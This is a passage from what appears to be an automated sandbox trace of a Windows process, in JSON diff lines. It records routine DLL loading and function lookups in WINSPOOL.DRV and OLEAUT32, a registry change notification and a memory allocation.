"GetPrintProcessorDirectoryW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73982440" + } + ], + "repeated": 0, + "id": 99 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967969", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrintProcessorDatatypesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980940" + } + ], + "repeated": 0, + "id": 100 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396797a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "207" + }, + { + "name": "FunctionAddress", + "value": "0x7397e010" + } + ], + "repeated": 0, + "id": 101 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396798b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "209" + }, + { + "name": "FunctionAddress", + "value": "0x7397fa40" + } + ], + "repeated": 0, + "id": 102 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396799c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "211" + }, + { + "name": "FunctionAddress", + "value": "0x739806f0" + } + ], + "repeated": 0, + "id": 103 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739679ad", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "212" + }, + { + "name": "FunctionAddress", + "value": "0x73960720" + } + ], + "repeated": 0, + "id": 104 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739679be", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SplDriverUnloadComplete" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983bb0" + } + ], + "repeated": 0, + "id": 105 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739679cf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "213" + }, + { + "name": "FunctionAddress", + "value": "0x739607d0" + } + ], + "repeated": 0, + "id": 106 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739679e0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "214" + }, + { + "name": "FunctionAddress", + "value": "0x73960680" + } + ], + "repeated": 0, + "id": 107 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739679f1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "OpenPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73966770" + } + ], + "repeated": 0, + "id": 108 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a02", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "OpenPrinterA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739761e0" + } + ], + "repeated": 0, + "id": 109 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a13", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "ResetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73962170" + } + ], + "repeated": 0, + "id": 110 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a24", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "StartDocPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395d0a0" + } + ], + "repeated": 0, + "id": 111 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a35", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "FlushPrinter" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739811c0" + } + ], + "repeated": 0, + "id": 112 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a46", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73966230" + } + ], + "repeated": 0, + "id": 113 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a57", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983580" + } + ], + "repeated": 0, + "id": 114 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a68", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397dbc0" + } + ], + "repeated": 0, + "id": 115 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a79", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "ScheduleJob" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73982be0" + } + ], + "repeated": 0, + "id": 116 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a8a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "WaitForPrinterChange" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73986dd0" + } + ], + "repeated": 0, + "id": 117 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967a9b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "FindNextPrinterChangeNotification" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395fc80" + } + ], + "repeated": 0, + "id": 118 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967aac", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "PrinterMessageBoxW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73982ba0" + } + ], + "repeated": 0, + "id": 119 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967abd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "ClosePrinter" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73966140" + } + ], + "repeated": 0, + "id": 120 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967ace", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397da70" + } + ], + "repeated": 0, + "id": 121 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967adf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeleteFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397f820" + } + ], + "repeated": 0, + "id": 122 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967af0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395ddd0" + } + ], + "repeated": 0, + "id": 123 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b01", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetFormW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983020" + } + ], + "repeated": 0, + "id": 124 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b12", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumFormsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739608b0" + } + ], + "repeated": 0, + "id": 125 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b23", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPortsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739807f0" + } + ], + "repeated": 0, + "id": 126 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b34", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumMonitorsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739805a0" + } + ], + "repeated": 0, + "id": 127 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b45", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397e1b0" + } + ], + "repeated": 0, + "id": 128 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b56", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "ConfigurePortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397eff0" + } + ], + "repeated": 0, + "id": 129 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b67", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397fae0" + } + ], + "repeated": 0, + "id": 130 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b78", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73960f00" + } + ], + "repeated": 0, + "id": 131 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b89", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398f1a0" + } + ], + "repeated": 0, + "id": 132 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967b9a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "234" + }, + { + "name": "FunctionAddress", + "value": "0x739792a0" + } + ], + "repeated": 0, + "id": 133 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967bab", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetJobNamedPropertyValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73990b00" + } + ], + "repeated": 0, + "id": 134 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967bbc", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetJobNamedProperty" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73962a60" + } + ], + "repeated": 0, + "id": 135 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967bcd", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "FreePrintPropertyValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73990a80" + } + ], + "repeated": 0, + "id": 136 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967bde", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeleteJobNamedProperty" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73990690" + } + ], + "repeated": 0, + "id": 137 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967bef", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumJobNamedProperties" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739907c0" + } + ], + "repeated": 0, + "id": 138 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c00", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "FreePrintNamedPropertyArray" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739909d0" + } + ], + "repeated": 0, + "id": 139 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c11", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrintOutputInfo" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73981fe0" + } + ], + "repeated": 0, + "id": 140 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c22", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "261" + }, + { + "name": "FunctionAddress", + "value": "0x739825a0" + } + ], + "repeated": 0, + "id": 141 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c33", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "365" + }, + { + "name": "FunctionAddress", + "value": "0x7396bdc0" + } + ], + "repeated": 0, + "id": 142 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c44", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "367" + }, + { + "name": "FunctionAddress", + "value": "0x7396bcf0" + } + ], + "repeated": 0, + "id": 143 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967c55", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "368" + }, + { + "name": "FunctionAddress", + "value": "0x7396c320" + } + ], + "repeated": 0, + "id": 144 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x7703cd17", + "parentcaller": "0x756c5886", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\winspool.drv" + }, + { + "name": "BaseAddress", + "value": "0x73950000" + }, + { + "name": "InitRoutine", + "value": "0x73968b70" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 145 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x72e83a0c", + "parentcaller": "0x72e7445e", + "category": "registry", + "api": "RegNotifyChangeKeyValue", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FullName", + "value": "HKEY_CLASSES_ROOT\\" + }, + { + "name": "NotifyFilter", + "value": "0x00000005" + }, + { + "name": "WatchSubtree", + "value": "1" + }, + { + "name": "Asynchronous", + "value": "1" + } + ], + "repeated": 0, + "id": 146 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x004c3000" + }, + { + "name": "RegionSize", + "value": "0x00021000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 147 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\oledlg" + }, + { + "name": "BaseAddress", + "value": "0x72e70000" + }, + { + "name": "InitRoutine", + "value": "0x72e8f4f0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 148 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756b71bf", + "parentcaller": "0x72e52454", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "oleaut32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + } + ], + "repeated": 0, + "id": 149 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleIconToCursor" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f6c870" + } + ], + "repeated": 0, + "id": 150 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": "OleCreateFontIndirect" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76f31440" + } + ], + "repeated": 0, + "id": 151 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "OLEAUT32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76f00000" + }, + { + "name": "FunctionName", + "value": 